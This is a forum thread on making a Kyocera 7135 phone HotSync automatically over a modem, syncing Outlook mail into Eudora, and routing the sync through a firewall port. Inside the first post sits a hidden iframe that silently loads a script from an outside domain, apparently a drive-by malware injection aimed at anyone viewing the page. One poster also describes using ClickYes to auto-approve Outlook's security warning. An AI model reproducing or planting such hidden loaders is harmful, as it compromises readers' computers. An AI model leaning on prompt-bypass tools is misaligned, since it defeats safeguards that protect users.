+ Reply to Thread

Automatic HotSync via modem?

Hi all,

I've been trying to find a way to automatically have my 7135 HotSync via the modem to my work computer several times a day. I have everything worked out except the automatic part. Getting the 7135 to HotSync through express network was very easy, and it is great to have Eudora sync my email after Outlook has weeded out the spam. I've looked into AutoSync and WarmSync, but both of those will only HotSync if your palm is in the cradle. Any ideas?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

To that end, has anyone figured out how to make automatic calls to anywhere?? i.e. periodically use #646 to get text message of minutes sent and then automatically disconnect when call complete (or after 10 seconds until text message sent confirmation)??

As for hot sync via modem
    Is it possible to have the PC call your cell at a certain time, and then hotsync (I have not yet done hotsync over modem)? If it is possible to launch a program at a specified time, perhaps...

Good luck
    :biglaughc

JigSawMan, how did you get your Hotsync to work wireless with your desktop?

Autosync will work without power bring in the cradle if you uncheck the "While plugged in" box. However, you are limited to one sync schedule. It will sync however you have the hotsync application setup. If it is setup for local, then it will attempt to sync to your PC as if it was in the cradle. If setup for modem sync, it will do that.

Are you able to sync via modem manually without intervention after starting it?

I think I have a solution, stay tuned, answers coming up.

OK, I got it figured out now. The first thing I want to make clear is that running a HotSync over Express Network is pretty slow. I have mine set to ONLY sync my Eudora email when I do the modem Hotsync.

Since I had never done a modem HotSync, I needed to figure out how to do it. Mergic as a great web page set up HERE that walks you right through the setup process. Note that if the computer you want to HotSync with is behind a firewall, you will need to setup a VPN. I do not have to deal with a firewall, so I did not do this. Mergic will be happy to sell you that part of the solution, I'm not endorsing them, but since their page helped me set up my 7135, I figure a little advertising for them is in order.

Once I got the modem HotSync running, the next problem I ran into was that Eudora was not pulling my mail from Outlook. This yurned out to be a simple thing to fix, as I had not installed the Eudora conduit from the CDROM that came with my 7135.

Once installed that software I ran into the next problem. Outlook 2002 (and late SP patched versions of Outlook 2000) have a security "feature" that will not allow unknown apps to access Outlook. Everytime I tried to Hotsync after I added the Eudora conduit I got a box that popped up reading "A program is trying to access e-mail addresses you have stored in Outlook." with some other stuff and requiring you to authorize the connection. This basically blew my plan out of the water, because what good is a remote HotSync if you need to be sitting in front of the computer to allow access? I ran around trying to find a solution and ended up using the program ClickYes . This program sits idle on your computer and when that requester box pops up, it basically answers for you. This sort of bypasses the issue, but the problem with ClickYes, is that it does not run as a service, so when you lock the workstation, it is deactivated. I have no solution for that, so I dunno how long term I'll try this. I'm not comfortable leaving my computer unsecured when I'm not around. Are there any programmers here that could make ClickYes into a service? Or adapt Outlook Redemption for the Eudora conduit software?

OK, need to do some real work, back in a bit for part II of this.

Well, we are at the point where the Kyo 7135 will successfully modem HotSync and pull my Outlook 2002 email into Eudora. You may be asking yourself, "Why is he bothering to do this HotSync stuff when he could hit the email server directly with Eudora?" The one big reason is spam. I have Cloudmark SpamNet running on Outlook and it has been VERY effective in reducing the spam I have to weed through. I even have SpamNet configured to weed out the spam that hits my Hotmail account. Other than that, I'm not too impressed with being able to do a modem Hotsync, it is terribly slow and I really don't see much of a reason to Hotsync other than to backup your datebook. Since I have BackupBuddyVFS and can backup to the SD slot, there is no real reason to worry about remote backups.

Anyway, back to the thread topic.

The first way I tried to set up an automatic HotSync was with the AutoSync software included with BackupBuddy. This did not get it at all. It would only schedule to once a day, and did not offer modem HotSync; the pda had to be in the cradle.

Next I hit faithful Google and did some searching. I came up with two answers WarmSync and AutoSync. Thinking, "I already tried AutoSync." I started to dismiss it out of hand, but figured maybe it was a different version so I'd take a look. That was the ticket, this AutoSync was more configurable for scheduling and had an X-Master add on which would eliminate the requirement for the pda to be in a cradle. I'm not sure that the two different AutoSync programs are even related, might just be a coincidence they are named the same thing. After some fiddling around with it, I got AutoSync going and now my 7135 is all set to Auto modem HotSync every hour during the times I'm not in the office. The software even has a nice preference selection that allows AutoSync to run another prgram after the HotSync completes. I have mine set to go back to phone mode on my 7135. When AutoSync starts up it displays a cancellation screen so you can stop the process if you are in the middle of something. I have not had it try to kick off when I'm in the middle of a phone call, so that will be a new adventure when it happens. I'm assuming you cannot be on Express Network and the phone at the same time, so this might be interesting.

Are you able to sync via modem manually without intervention after starting it?
    Yep, no intervention on my part, unless I want to cancel the HotSync. There is a prefs option on how long a time period you have before the HotSync actually starts. So you first get a screen pop up telling you the AutoSync software is about to start the HotSync. In the middle there is a countdown timer telling you how long you have reamining to cancel the task. If you ignore it the HotSync progresses all on its own.

Originally posted by JigSawMan
    Note that if the computer you want to HotSync with is behind a firewall, you will need to setup a VPN. I do not have to deal with a firewall, so I did not do this. Mergic will be happy to sell you that part of the solution
    Actually, this is not entirely the case. (Great writeup on the rest of it though.) If you have control over the firewall, it's possible to set it up to allow syncing through. There is a slight security risk in doing this, but it would really depend on someone knowing a lot about your system in order to take advantage of it. But you don't have to pay Mergic, or set up a VPN, to do it.

What you have to do is open a sync port on the firewall. You also have to have one internal IP address mapped to receive the sync from one external IP address. In other words, when a sync request comes in on the sync port from that external IP, the firewall routes the traffic to the internal IP you've given it, which will be your PC. This is a slight challenge if your firewall is doing NAT, or DHCP, which most are, but can be worked around, especially in a small office.

(For our home office, we have one external IP, and two people, and we just change the destination of the remote hotsync, based on who is travelling that week. And we gave the PC's with Palm profiles on them static IP's. For a larger office, you'd probably have more external IP's, and maybe still not too many people wanting to do this, so you might be able to give them each their own in the same way.)

Thanks for the clarification!